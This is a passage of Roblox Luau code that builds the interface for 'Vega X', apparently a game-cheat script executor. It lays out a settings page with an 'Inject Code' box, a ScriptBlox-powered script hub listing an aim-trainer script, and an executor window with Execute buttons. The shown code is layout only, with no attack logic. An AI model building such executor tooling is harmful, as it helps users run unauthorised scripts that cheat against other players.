16.000 UICorner_4.CornerRadius = UDim.new(0, 10) UICorner_4.Parent = FPSTextBox ResetFPS.Name = "ResetFPS" ResetFPS.Parent = S2 ResetFPS.AnchorPoint = Vector2.new(1, 0.5) ResetFPS.BackgroundColor3 = Color3.fromRGB(67, 67, 67) ResetFPS.BorderSizePixel = 0 ResetFPS.LayoutOrder = 10 ResetFPS.Position = UDim2.new(1, -20, 0.5, 0) ResetFPS.Size = UDim2.new(0, 34, 0, 34) ResetFPS.ZIndex = 2 ResetFPS.Image = "rbxassetid://3926307971" ResetFPS.ImageRectOffset = Vector2.new(404, 84) ResetFPS.ImageRectSize = Vector2.new(36, 36) UICorner_5.CornerRadius = UDim.new(0, 10) UICorner_5.Parent = ResetFPS S3.Name = "S3" S3.Parent = ScrollingFrame S3.BackgroundColor3 = Color3.fromRGB(38, 38, 38) S3.BorderSizePixel = 0 S3.Size = UDim2.new(1, -10, 0, 75) Title_3.Name = "Title" Title_3.Parent = S3 Title_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_3.BackgroundTransparency = 1.000 Title_3.BorderSizePixel = 0 Title_3.Position = UDim2.new(0, 25, 0, 0) Title_3.Size = UDim2.new(0.5, 0, 0.5, 0) Title_3.Font = Enum.Font.GothamBold Title_3.Text = "Dev Mode" Title_3.TextColor3 = Color3.fromRGB(255, 255, 255) Title_3.TextSize = 19.000 Title_3.TextXAlignment = Enum.TextXAlignment.Left Title_3.TextYAlignment = Enum.TextYAlignment.Bottom SubTitle_3.Name = "SubTitle" SubTitle_3.Parent = S3 SubTitle_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle_3.BackgroundTransparency = 1.000 SubTitle_3.BorderSizePixel = 0 SubTitle_3.Position = UDim2.new(0, 25, 0.5, 0) SubTitle_3.Size = UDim2.new(0.5, 0, 0.5, 0) SubTitle_3.Font = Enum.Font.Gotham SubTitle_3.Text = "Allow Vega X Cross Platform Connection with the Windows UI." SubTitle_3.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle_3.TextSize = 14.000 SubTitle_3.TextXAlignment = Enum.TextXAlignment.Left SubTitle_3.TextYAlignment = Enum.TextYAlignment.Top UICorner_6.CornerRadius = UDim.new(0, 10) UICorner_6.Parent = S3 SubmitCode.Name = "SubmitCode" SubmitCode.Parent = S3 SubmitCode.AnchorPoint = Vector2.new(1, 0.5) SubmitCode.BackgroundColor3 = Color3.fromRGB(67, 67, 67) SubmitCode.BorderSizePixel = 0 SubmitCode.LayoutOrder = 10 SubmitCode.Position = UDim2.new(1, -59, 0.5, 0) SubmitCode.Size = UDim2.new(0, 34, 0, 34) SubmitCode.ZIndex = 2 SubmitCode.Image = "rbxassetid://3926305904" SubmitCode.ImageRectOffset = Vector2.new(124, 924) SubmitCode.ImageRectSize = Vector2.new(36, 36) UICorner_7.CornerRadius = UDim.new(0, 10) UICorner_7.Parent = SubmitCode InjectCodeTextbox.Name = "InjectCodeTextbox" InjectCodeTextbox.Parent = S3 InjectCodeTextbox.AnchorPoint = Vector2.new(1, 0.5) InjectCodeTextbox.BackgroundColor3 = Color3.fromRGB(89, 89, 89) InjectCodeTextbox.BackgroundTransparency = 0.200 InjectCodeTextbox.BorderSizePixel = 0 InjectCodeTextbox.Position = UDim2.new(1, -98, 0.5, 0) InjectCodeTextbox.Size = UDim2.new(0.200000003, 0, 0, 34) InjectCodeTextbox.ClearTextOnFocus = false InjectCodeTextbox.Font = Enum.Font.Gotham InjectCodeTextbox.MultiLine = true InjectCodeTextbox.PlaceholderText = "Inject Code" InjectCodeTextbox.Text = "" InjectCodeTextbox.TextColor3 = Color3.fromRGB(220, 220, 220) InjectCodeTextbox.TextSize = 16.000 UICorner_8.CornerRadius = UDim.new(0, 10) UICorner_8.Parent = InjectCodeTextbox ResetCode.Name = "ResetCode" ResetCode.Parent = S3 ResetCode.AnchorPoint = Vector2.new(1, 0.5) ResetCode.BackgroundColor3 = Color3.fromRGB(67, 67, 67) ResetCode.BorderSizePixel = 0 ResetCode.LayoutOrder = 10 ResetCode.Position = UDim2.new(1, -20, 0.5, 0) ResetCode.Size = UDim2.new(0, 34, 0, 34) ResetCode.ZIndex = 2 ResetCode.Image = "rbxassetid://3926305904" ResetCode.ImageRectOffset = Vector2.new(644, 724) ResetCode.ImageRectSize = Vector2.new(36, 36) UICorner_9.CornerRadius = UDim.new(0, 10) UICorner_9.Parent = ResetCode S1.Name = "S1" S1.Parent = ScrollingFrame S1.BackgroundColor3 = Color3.fromRGB(38, 38, 38) S1.BorderSizePixel = 0 S1.Size = UDim2.new(1, -10, 0, 75) Title_4.Name = "Title" Title_4.Parent = S1 Title_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_4.BackgroundTransparency = 1.000 Title_4.BorderSizePixel = 0 Title_4.Position = UDim2.new(0, 25, 0, 0) Title_4.Size = UDim2.new(0.5, 0, 0.5, 0) Title_4.Font = Enum.Font.GothamBold Title_4.Text = "Change UI Accent Color" Title_4.TextColor3 = Color3.fromRGB(255, 255, 255) Title_4.TextSize = 19.000 Title_4.TextXAlignment = Enum.TextXAlignment.Left Title_4.TextYAlignment = Enum.TextYAlignment.Bottom SubTitle_4.Name = "SubTitle" SubTitle_4.Parent = S1 SubTitle_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle_4.BackgroundTransparency = 1.000 SubTitle_4.BorderSizePixel = 0 SubTitle_4.Position = UDim2.new(0, 25, 0.5, 0) SubTitle_4.Size = UDim2.new(0.5, 0, 0.5, 0) SubTitle_4.Font = Enum.Font.Gotham SubTitle_4.Text = "Change Vega X Button Colors." SubTitle_4.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle_4.TextSize = 14.000 SubTitle_4.TextXAlignment = Enum.TextXAlignment.Left SubTitle_4.TextYAlignment = Enum.TextYAlignment.Top UICorner_10.CornerRadius = UDim.new(0, 10) UICorner_10.Parent = S1 AccentColorPreview.Name = "AccentColorPreview" AccentColorPreview.Parent = S1 AccentColorPreview.AnchorPoint = Vector2.new(1, 0.5) AccentColorPreview.BackgroundColor3 = Color3.fromRGB(255, 255, 255) AccentColorPreview.Position = UDim2.new(1, -20, 0.5, 0) AccentColorPreview.Size = UDim2.new(0, 34, 0, 34) UICorner_11.CornerRadius = UDim.new(0, 10) UICorner_11.Parent = AccentColorPreview SubmitAccent.Name = "SubmitAccent" SubmitAccent.Parent = S1 SubmitAccent.AnchorPoint = Vector2.new(1, 0.5) SubmitAccent.BackgroundColor3 = Color3.fromRGB(67, 67, 67) SubmitAccent.BorderSizePixel = 0 SubmitAccent.LayoutOrder = 10 SubmitAccent.Position = UDim2.new(1, -59, 0.5, 0) SubmitAccent.Size = UDim2.new(0, 34, 0, 34) SubmitAccent.ZIndex = 2 SubmitAccent.Image = "rbxassetid://3926305904" SubmitAccent.ImageRectOffset = Vector2.new(124, 924) SubmitAccent.ImageRectSize = Vector2.new(36, 36) UICorner_12.CornerRadius = UDim.new(0, 10) UICorner_12.Parent = SubmitAccent AccentTextBox.Name = "AccentTextBox" AccentTextBox.Parent = S1 AccentTextBox.AnchorPoint = Vector2.new(1, 0.5) AccentTextBox.BackgroundColor3 = Color3.fromRGB(89, 89, 89) AccentTextBox.BackgroundTransparency = 0.200 AccentTextBox.BorderSizePixel = 0 AccentTextBox.Position = UDim2.new(1, -98, 0.5, 0) AccentTextBox.Size = UDim2.new(0.200000003, 0, 0, 34) AccentTextBox.ClearTextOnFocus = false AccentTextBox.Font = Enum.Font.Gotham AccentTextBox.MultiLine = true AccentTextBox.PlaceholderText = "Hex Value" AccentTextBox.Text = "" AccentTextBox.TextColor3 = Color3.fromRGB(220, 220, 220) AccentTextBox.TextSize = 16.000 UICorner_13.CornerRadius = UDim.new(0, 10) UICorner_13.Parent = AccentTextBox S4.Name = "S4" S4.Parent = ScrollingFrame S4.BackgroundColor3 = Color3.fromRGB(38, 38, 38) S4.BorderSizePixel = 0 S4.Size = UDim2.new(1, -10, 0, 75) S4.Visible = false Title_5.Name = "Title" Title_5.Parent = S4 Title_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_5.BackgroundTransparency = 1.000 Title_5.BorderSizePixel = 0 Title_5.Position = UDim2.new(0, 25, 0, 0) Title_5.Size = UDim2.new(0.5, 0, 0.5, 0) Title_5.Font = Enum.Font.GothamBold Title_5.Text = "禁用介绍动画" Title_5.TextColor3 = Color3.fromRGB(255, 255, 255) Title_5.TextSize = 19.000 Title_5.TextXAlignment = Enum.TextXAlignment.Left Title_5.TextYAlignment = Enum.TextYAlignment.Bottom SubTitle_5.Name = "SubTitle" SubTitle_5.Parent = S4 SubTitle_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle_5.BackgroundTransparency = 1.000 SubTitle_5.BorderSizePixel = 0 SubTitle_5.Position = UDim2.new(0, 25, 0.5, 0) SubTitle_5.Size = UDim2.new(0.5, 0, 0.5, 0) SubTitle_5.Font = Enum.Font.Gotham SubTitle_5.Text = "立即跳转到 Vega X" SubTitle_5.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle_5.TextSize = 14.000 SubTitle_5.TextXAlignment = Enum.TextXAlignment.Left SubTitle_5.TextYAlignment = Enum.TextYAlignment.Top UICorner_14.CornerRadius = UDim.new(0, 10) UICorner_14.Parent = S4 ToggleBTN.Name = "ToggleBTN" ToggleBTN.Parent = S4 ToggleBTN.AnchorPoint = Vector2.new(1, 0.5) ToggleBTN.BackgroundColor3 = Color3.fromRGB(195, 57, 57) ToggleBTN.BorderColor3 = Color3.fromRGB(0, 0, 0) ToggleBTN.BorderSizePixel = 0 ToggleBTN.Position = UDim2.new(1, -20, 0.5, 0) ToggleBTN.Size = UDim2.new(0, 34, 0, 34) ToggleBTN.Font = Enum.Font.SourceSans ToggleBTN.Text = "" ToggleBTN.TextColor3 = Color3.fromRGB(0, 0, 0) ToggleBTN.TextSize = 14.000 UICorner_15.CornerRadius = UDim.new(0, 10) UICorner_15.Parent = ToggleBTN ScriptHubWindow.Name = "ScriptHubWindow" ScriptHubWindow.Parent = VegaXAndroidUI ScriptHubWindow.AnchorPoint = Vector2.new(0, 0.5) ScriptHubWindow.BackgroundColor3 = Color3.fromRGB(20, 20, 20) ScriptHubWindow.BorderColor3 = Color3.fromRGB(30, 30, 30) ScriptHubWindow.BorderSizePixel = 0 ScriptHubWindow.Position = UDim2.new(1, 200, 0.5, -20) ScriptHubWindow.Size = UDim2.new(1, -200, 1, 40) WindowMainTitle_2.Name = "WindowMainTitle" WindowMainTitle_2.Parent = ScriptHubWindow WindowMainTitle_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle_2.BackgroundTransparency = 1.000 WindowMainTitle_2.BorderSizePixel = 0 WindowMainTitle_2.Position = UDim2.new(0, 7, 0, 52) WindowMainTitle_2.Size = UDim2.new(0, 309, 0, 21) WindowMainTitle_2.Font = Enum.Font.GothamBold WindowMainTitle_2.Text = "Script Hub" WindowMainTitle_2.TextColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle_2.TextSize = 18.000 WindowMainTitle_2.TextXAlignment = Enum.TextXAlignment.Left WindowMainTitle_2.TextYAlignment = Enum.TextYAlignment.Top CloseB_2.Name = "CloseB" CloseB_2.Parent = ScriptHubWindow CloseB_2.AnchorPoint = Vector2.new(1, 0) CloseB_2.BackgroundTransparency = 1.000 CloseB_2.BorderSizePixel = 0 CloseB_2.LayoutOrder = 6 CloseB_2.Position = UDim2.new(1, -5, 0, 45) CloseB_2.Size = UDim2.new(0, 25, 0, 25) CloseB_2.ZIndex = 2 CloseB_2.Image = "rbxassetid://3926307971" CloseB_2.ImageRectOffset = Vector2.new(884, 284) CloseB_2.ImageRectSize = Vector2.new(36, 36) ScrollingFrame_2.Parent = ScriptHubWindow ScrollingFrame_2.Active = true ScrollingFrame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScrollingFrame_2.BackgroundTransparency = 1.000 ScrollingFrame_2.BorderSizePixel = 0 ScrollingFrame_2.Position = UDim2.new(0, 0, 0, 136) ScrollingFrame_2.Size = UDim2.new(1, 0, 1, -126) ScrollingFrame_2.CanvasSize = UDim2.new(0, 0, 1, 0) ScrollingFrame_2.ScrollBarThickness = 0 S1_2.Name = "S1" S1_2.Parent = ScrollingFrame_2 S1_2.BackgroundColor3 = Color3.fromRGB(38, 38, 38) S1_2.BorderSizePixel = 0 S1_2.Size = UDim2.new(1, -10, 0, 80) S1_2.Visible = false Execute.Name = "Execute" Execute.Parent = S1_2 Execute.AnchorPoint = Vector2.new(1, 0.5) Execute.BackgroundColor3 = Color3.fromRGB(67, 67, 67) Execute.BackgroundTransparency = 0.400 Execute.BorderSizePixel = 0 Execute.LayoutOrder = 10 Execute.Position = UDim2.new(1, -23, 0.5, 0) Execute.Size = UDim2.new(0, 34, 0, 34) Execute.ZIndex = 2 Execute.Image = "rbxassetid://3926307971" Execute.ImageRectOffset = Vector2.new(764, 244) Execute.ImageRectSize = Vector2.new(36, 36) UICorner_16.CornerRadius = UDim.new(0, 10) UICorner_16.Parent = Execute UICorner_17.CornerRadius = UDim.new(0, 10) UICorner_17.Parent = S1_2 ImageLabel.Parent = S1_2 ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BackgroundTransparency = 1.000 ImageLabel.BorderSizePixel = 0 ImageLabel.Size = UDim2.new(1, 0, 1, 0) ImageLabel.Image = "http://www.roblox.com/asset/?id=11716682263" ImageLabel.ScaleType = Enum.ScaleType.Crop UICorner_18.CornerRadius = UDim.new(0, 10) UICorner_18.Parent = ImageLabel SubTitle_6.Name = "SubTitle" SubTitle_6.Parent = S1_2 SubTitle_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle_6.BackgroundTransparency = 1.000 SubTitle_6.BorderSizePixel = 0 SubTitle_6.Position = UDim2.new(0, 25, 0.5, 0) SubTitle_6.Size = UDim2.new(1, -93, 0.5, 0) SubTitle_6.Font = Enum.Font.Gotham SubTitle_6.Text = "MM2 Aim Trainer 🎯 " SubTitle_6.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle_6.TextSize = 14.000 SubTitle_6.TextXAlignment = Enum.TextXAlignment.Left SubTitle_6.TextYAlignment = Enum.TextYAlignment.Top Title_6.Name = "Title" Title_6.Parent = S1_2 Title_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_6.BackgroundTransparency = 1.000 Title_6.BorderSizePixel = 0 Title_6.Position = UDim2.new(0, 25, 0, 0) Title_6.Size = UDim2.new(1, -93, 0.5, 0) Title_6.Font = Enum.Font.GothamBold Title_6.Text = "Silent" Title_6.TextColor3 = Color3.fromRGB(255, 255, 255) Title_6.TextSize = 19.000 Title_6.TextXAlignment = Enum.TextXAlignment.Left Title_6.TextYAlignment = Enum.TextYAlignment.Bottom UIListLayout_2.Parent = ScrollingFrame_2 UIListLayout_2.HorizontalAlignment = Enum.HorizontalAlignment.Center UIListLayout_2.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout_2.Padding = UDim.new(0, 5) SearchBox.Name = "SearchBox" SearchBox.Parent = ScriptHubWindow SearchBox.BackgroundColor3 = Color3.fromRGB(38, 38, 38) SearchBox.BorderSizePixel = 0 SearchBox.Position = UDim2.new(0, 5, 0, 91) SearchBox.Size = UDim2.new(1, -115, 0, 40) SearchBox.Font = Enum.Font.Gotham SearchBox.PlaceholderText = "Search for a Script Here" SearchBox.Text = "" SearchBox.TextColor3 = Color3.fromRGB(220, 220, 220) SearchBox.TextSize = 14.000 SearchBox.TextXAlignment = Enum.TextXAlignment.Left UICorner_19.CornerRadius = UDim.new(0, 10) UICorner_19.Parent = SearchBox SearchButton.Name = "SearchButton" SearchButton.Parent = ScriptHubWindow SearchButton.AnchorPoint = Vector2.new(1, 0) SearchButton.BackgroundTransparency = 1.000 SearchButton.LayoutOrder = 1 SearchButton.Position = UDim2.new(1, -115, 0, 99) SearchButton.Size = UDim2.new(0, 25, 0, 25) SearchButton.ZIndex = 2 SearchButton.AutoButtonColor = false SearchButton.Image = "rbxassetid://3926305904" SearchButton.ImageRectOffset = Vector2.new(964, 324) SearchButton.ImageRectSize = Vector2.new(36, 36) WindowSubTitle.Name = "WindowSubTitle" WindowSubTitle.Parent = ScriptHubWindow WindowSubTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255) WindowSubTitle.BackgroundTransparency = 1.000 WindowSubTitle.BorderSizePixel = 0 WindowSubTitle.Position = UDim2.new(0, 7, 0, 72) WindowSubTitle.Size = UDim2.new(0, 309, 0, 14) WindowSubTitle.Font = Enum.Font.Gotham WindowSubTitle.Text = "Powered by ScriptBlox, Aggregation System by Zyrex, Modified by Rudy." WindowSubTitle.TextColor3 = Color3.fromRGB(255, 255, 255) WindowSubTitle.TextSize = 12.000 WindowSubTitle.TextXAlignment = Enum.TextXAlignment.Left WindowSubTitle.TextYAlignment = Enum.TextYAlignment.Top PaginationFrame.Name = "PaginationFrame" PaginationFrame.Parent = ScriptHubWindow PaginationFrame.AnchorPoint = Vector2.new(1, 0) PaginationFrame.BackgroundColor3 = Color3.fromRGB(38, 38, 38) PaginationFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) PaginationFrame.BorderSizePixel = 0 PaginationFrame.Position = UDim2.new(1, -5, 0, 91) PaginationFrame.Size = UDim2.new(0, 100, 0, 40) UICorner_20.CornerRadius = UDim.new(0, 10) UICorner_20.Parent = PaginationFrame LeftPage.Name = "LeftPage" LeftPage.Parent = PaginationFrame LeftPage.BackgroundTransparency = 1.000 LeftPage.LayoutOrder = 5 LeftPage.Rotation = 180.000 LeftPage.Size = UDim2.new(0, 25, 1, 0) LeftPage.ZIndex = 2 LeftPage.Image = "rbxassetid://3926307971" LeftPage.ImageRectOffset = Vector2.new(764, 244) LeftPage.ImageRectSize = Vector2.new(36, 36) LeftPage.ScaleType = Enum.ScaleType.Fit RightPage.Name = "RightPage" RightPage.Parent = PaginationFrame RightPage.AnchorPoint = Vector2.new(1, 0) RightPage.BackgroundTransparency = 1.000 RightPage.LayoutOrder = 5 RightPage.Position = UDim2.new(1, 0, 0, 0) RightPage.Size = UDim2.new(0, 25, 1, 0) RightPage.ZIndex = 2 RightPage.Image = "rbxassetid://3926307971" RightPage.ImageRectOffset = Vector2.new(764, 244) RightPage.ImageRectSize = Vector2.new(36, 36) RightPage.ScaleType = Enum.ScaleType.Fit PageLabel.Name = "PageLabel" PageLabel.Parent = PaginationFrame PageLabel.AnchorPoint = Vector2.new(0.5, 0) PageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) PageLabel.BackgroundTransparency = 1.000 PageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) PageLabel.BorderSizePixel = 0 PageLabel.Position = UDim2.new(0.5, 0, 0, 0) PageLabel.Size = UDim2.new(1, -50, 1, 0) PageLabel.Font = Enum.Font.Gotham PageLabel.Text = "1" PageLabel.TextColor3 = Color3.fromRGB(255, 255, 255) PageLabel.TextSize = 14.000 ExecutorWindow.Name = "ExecutorWindow" ExecutorWindow.Parent = VegaXAndroidUI ExecutorWindow.AnchorPoint = Vector2.new(0, 0.5) ExecutorWindow.BackgroundColor3 = Color3.fromRGB(20, 20, 20) ExecutorWindow.BackgroundTransparency = 0.400 ExecutorWindow.BorderColor3 = Color3.fromRGB(30, 30, 30) ExecutorWindow.BorderSizePixel = 0 ExecutorWindow.Position = UDim2.new(1, 200, 0.5, -20) ExecutorWindow.Size = UDim2.new(1, -200, 1, 40) ExecuteB.Name = "ExecuteB" ExecuteB.Parent = ExecutorWindow ExecuteB.Active = false ExecuteB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) ExecuteB.BorderSizePixel = 0 ExecuteB.Position = UDim2.new(0, 5, 0, 78) ExecuteB.Size = UDim2.new(0, 80, 0, 30) ExecuteB.Font = Enum.Font.GothamBold ExecuteB.Text = "Execute" ExecuteB.TextColor3 = Color3.fromRGB(255, 255, 255) ExecuteB.TextSize = 14.000 UICorner_21.CornerRadius = UDim.new(0, 4) UICorner_21.Parent = ExecuteB PasteandExecuteB.Name = "PasteandExecuteB" PasteandExecuteB.Parent = ExecutorWindow PasteandExecuteB.Active = false PasteandExecuteB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) PasteandExecuteB.BackgroundTransparency = 0.300 PasteandExecuteB.BorderSizePixel = 0 PasteandExecuteB.Position = UDim2.new(0, 90, 0, 78) PasteandExecuteB.Size = UDim2.new(0, 140, 0, 30) PasteandExecuteB.Font = Enum.Font.GothamBold PasteandExecuteB.Text = "Paste and Execute" PasteandExecuteB.TextColor3 = Color3.fromRGB(255, 255, 255) PasteandExecuteB.TextSize = 14.000 UICorner_22.CornerRadius = UDim.new(0, 4) UICorner_22.Parent = PasteandExecuteB CloseB_3.Name = "CloseB" CloseB_3.Parent = ExecutorWindow CloseB_3.AnchorPoint = Vector2.new(1, 0) CloseB_3.BackgroundTransparency = 1.000 CloseB_3.BorderSizePixel = 0 CloseB_3.LayoutOrder = 6 CloseB_3.Position = UDim2.new(1, -5, 0, 45) CloseB_3.Size = UDim2.new(0, 25, 0, 25) CloseB_3.ZIndex = 2 CloseB_3.Image = "rbxassetid://3926307971" CloseB_3.ImageRectOffset = Vector2.new(884, 284) CloseB_3.ImageRectSize = Vector2.new(36, 36) ScrollingBox.Name = "ScrollingBox" ScrollingBox.Parent = ExecutorWindow ScrollingBox.Active = true ScrollingBox.AnchorPoint = Vector2.new(0.5, 1) ScrollingBox.BackgroundColor3 = Color3.fromRGB(31, 31, 31) ScrollingBox.BackgroundTransparency = 0.200 ScrollingBox.BorderSizePixel = 0 ScrollingBox.Position = UDim2.new(0.5, 0, 1, -5) ScrollingBox.Size = UDim2.new(1, -10, 1, -153) ScrollingBox.CanvasSize = UDim2.new(0, 0, 0, 0) ScrollingBox.ScrollBarThickness = 2 TextBox.Parent = ScrollingBox TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBox.BackgroundTransparency = 1.000 TextBox.Position = UDim2.new(0, 30, 0, 0) TextBox.Size = UDim2.new(1, -30, 1, 0) TextBox.ZIndex = 4 TextBox.ClearTextOnFocus = false TextBox.Font = Enum.Font.Code TextBox.MultiLine = true TextBox.Text = "" TextBox.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox.TextSize = 16.000 TextBox.TextWrapped = true TextBox.TextXAlignment = Enum.TextXAlignment.Left TextBox.TextYAlignment = Enum.TextYAlignment.Top Line.Name = "Line" Line.Parent = ScrollingBox Line.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Line.BackgroundTransparency = 1.000 Line.BorderColor3 = Color3.fromRGB(27, 42, 53) Line.BorderSizePixel = 0 Line.Size = UDim2.new(0, 27, 1, 0) Line.ZIndex = 4 Line.Font = Enum.Font.Code Line.Text = "1 " Line.TextColor3 = Color3.fromRGB(203, 203, 203) Line.TextSize = 16.000 Line.TextWrapped = true Line.TextYAlignment = Enum.TextYAlignment.Top UICorner_23.CornerRadius = UDim.new(0, 5) UICorner_23.Parent = ScrollingBox TabbingSystem.Name = "TabbingSystem" TabbingSystem.Parent = ExecutorWindow TabbingSystem.BackgroundColor3 = Color3.fromRGB(195, 57, 57) TabbingSystem.Position = UDim2.new(0, 5, 0, 113) TabbingSystem.Size = UDim2.new(0, 224, 0, 30) ScriptPage.Name = "ScriptPage" ScriptPage.Parent = TabbingSystem ScriptPage.BackgroundColor3 = Color3.fromRGB(24, 144, 255) ScriptPage.BackgroundTransparency = 1.000 ScriptPage.BorderSizePixel = 0 ScriptPage.Position = UDim2.new(0, 5, 0, 0) ScriptPage.Size = UDim2.new(1, -70, 1, 0) ScriptPage.Font = Enum.Font.Gotham ScriptPage.Text = "Script 1" ScriptPage.TextColor3 = Color3.fromRGB(255, 255, 255) ScriptPage.TextSize = 14.000 ScriptPage.TextWrapped = true ScriptPage.TextXAlignment = Enum.TextXAlignment.Left NextPage.Name = "NextPage" NextPage.Parent = TabbingSystem NextPage.Active = false NextPage.AnchorPoint = Vector2.new(1, 0) NextPage.BackgroundColor3 = Color3.fromRGB(38, 38, 38) NextPage.BackgroundTransparency = 1.000 NextPage.BorderSizePixel = 0 NextPage.Position = UDim2.new(1, 0, 0, 0) NextPage.Size = UDim2.new(0, 20, 0, 30) NextPage.Font = Enum.Font.GothamBold NextPage.Text = ">" NextPage.TextColor3 = Color3.fromRGB(255, 255, 255) NextPage.TextSize = 14.000 LastPage.Name = "LastPage" LastPage.Parent = TabbingSystem LastPage.Active = false LastPage.AnchorPoint = Vector2.new(1, 0) LastPage.BackgroundColor3 = Color3.fromRGB(38, 38, 38) LastPage.BackgroundTransparency = 1.000 LastPage.BorderSizePixel = 0 LastPage.Position = UDim2.new(1, -20, 0, 0) LastPage.Size = UDim2.new(0, 20, 0, 30) LastPage.Font = Enum.Font.GothamBold LastPage.Text = "<" LastPage.TextColor3 = Color3.fromRGB(255, 255, 255) LastPage.TextSize = 14.000 UICorner_24.CornerRadius = UDim.new(0, 4) UICorner_24.Parent = TabbingSystem EditTabName.Name = "EditTabName" EditTabName.Parent = TabbingSystem EditTabName.AnchorPoint = Vector2.new(1, 0) EditTabName.BackgroundTransparency = 1.000 EditTabName.Position = UDim2.new(1, -40, 0, 0) EditTabName.Size = UDim2.new(0, 20, 0, 30) EditTabName.ZIndex = 2 EditTabName.Image = "rbxassetid://3926305904" EditTabName.ImageRectOffset = Vector2.new(924, 364) EditTabName.ImageRectSize = Vector2.new(36, 36) EditTabName.ScaleType = Enum.ScaleType.Fit EditTabBox.Name = "EditTabBox" EditTabBox.Parent = TabbingSystem EditTabBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) EditTabBox.BackgroundTransparency = 1.000 EditTabBox.BorderSizePixel = 0 EditTabBox.Position = UDim2.new(0, 5, 0, 0) EditTabBox.Size = UDim2.new(1, -70, 1, 0) EditTabBox.Visible = false EditTabBox.Font = Enum.Font.Gotham EditTabBox.PlaceholderColor3 = Color3.fromRGB(230, 230, 230) EditTabBox.PlaceholderText = "Place New Name Here" EditTabBox.Text = "" EditTabBox.TextColor3 = Color3.fromRGB(255, 255, 255) EditTabBox.TextSize = 14.000 EditTabBox.TextWrapped = true EditTabBox.TextXAlignment = Enum.TextXAlignment.Left WindowMainTitle_3.Name = "WindowMainTitle" WindowMainTitle_3.Parent = ExecutorWindow WindowMainTitle_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle_3.BackgroundTransparency = 1.000 WindowMainTitle_3.BorderSizePixel = 0 WindowMainTitle_3.Position = UDim2.new(0, 7, 0, 52) WindowMainTitle_3.Size = UDim2.new(0, 200, 0, 21) WindowMainTitle_3.Font = Enum.Font.GothamBold WindowMainTitle_3.Text = "Executor" WindowMainTitle_3.TextColor3 = Color3.fromRGB(255, 255, 255) WindowMainTitle_3.TextSize = 18.000 WindowMainTitle_3.TextXAlignment = Enum.TextXAlignment.Left WindowMainTitle_3.TextYAlignment = Enum.TextYAlignment.Top ClearB.Name = "ClearB" ClearB.Parent = ExecutorWindow ClearB.Active = false ClearB.BackgroundColor3 = Color3.fromRGB(38, 38, 38) ClearB.BorderSizePixel = 0 ClearB.Position = UDim2.new(0, 325, 0, 78) ClearB.Size = UDim2.new(0, 50, 0, 30) ClearB.Font = Enum.Font.GothamBold ClearB.Text = "Clear" ClearB.TextColor3 = Color3.fromRGB(255, 255, 255) ClearB.TextSize = 14.000 UICorner_25.CornerRadius = UDim.new(0, 4) UICorner_25.Parent = ClearB DevModeB.Name = "DevModeB" DevModeB.Parent = ExecutorWindow DevModeB.Active = false DevModeB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) DevModeB.BackgroundTransparency = 0.300 DevModeB.BorderSizePixel = 0 DevModeB.Position = UDim2.new(0, 235, 0, 78) DevModeB.Size = UDim2.new(0, 85, 0, 30) DevModeB.Font = Enum.Font.GothamBold DevModeB.Text = "Dev Mode" DevModeB.TextColor3 = Color3.fromRGB(255, 255, 255) DevModeB.TextSize = 14.000 UICorner_26.CornerRadius = UDim.new(0, 4) UICorner_26.Parent = DevModeB SidebarFrame.Name = "SidebarFrame" SidebarFrame.Parent = VegaXAndroidUI SidebarFrame.AnchorPoint = Vector2.new(0, 0.5) SidebarFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20) SidebarFrame.BorderSizePixel = 0 SidebarFrame.Position = UDim2.new(0, -200, 0.5, 0) SidebarFrame.Size = UDim2.new(0, 200, 1, 0) Banner.Name = "Banner" Banner.Parent = SidebarFrame Banner.BackgroundColor3 = Color3.fromRGB(195, 57, 57) Banner.BorderSizePixel = 0 Banner.Position = UDim2.new(0, 0, 0, -40) Banner.Size = UDim2.new(1, 0, 0, 190) HappyGuy.Name = "HappyGuy" HappyGuy.Parent = Banner HappyGuy.AnchorPoint = Vector2.new(0.5, 1) HappyGuy.BackgroundColor3 = Color3.fromRGB(255, 255, 255) HappyGuy.BackgroundTransparency = 1.000 HappyGuy.BorderSizePixel = 0 HappyGuy.Position = UDim2.new(0.5, 0, 1, 0) HappyGuy.Size = UDim2.new(1, 0, 1, -90) HappyGuy.Image = "http://www.roblox.com/asset/?id=13329667664" HappyGuy.ImageTransparency = 0.500 HappyGuy.ScaleType = Enum.ScaleType.Fit VegaXLogo_2.Name = "VegaXLogo" VegaXLogo_2.Parent = Banner VegaXLogo_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) VegaXLogo_2.BackgroundTransparency = 1.000 VegaXLogo_2.BorderSizePixel = 0 VegaXLogo_2.Position = UDim2.new(0, 10, 0, 50) VegaXLogo_2.Size = UDim2.new(0, 25, 0, 25) VegaXLogo_2.Image = "http://www.roblox.com/asset/?id=15861930865" TitleLabel.Name = "TitleLabel" TitleLabel.Parent = Banner 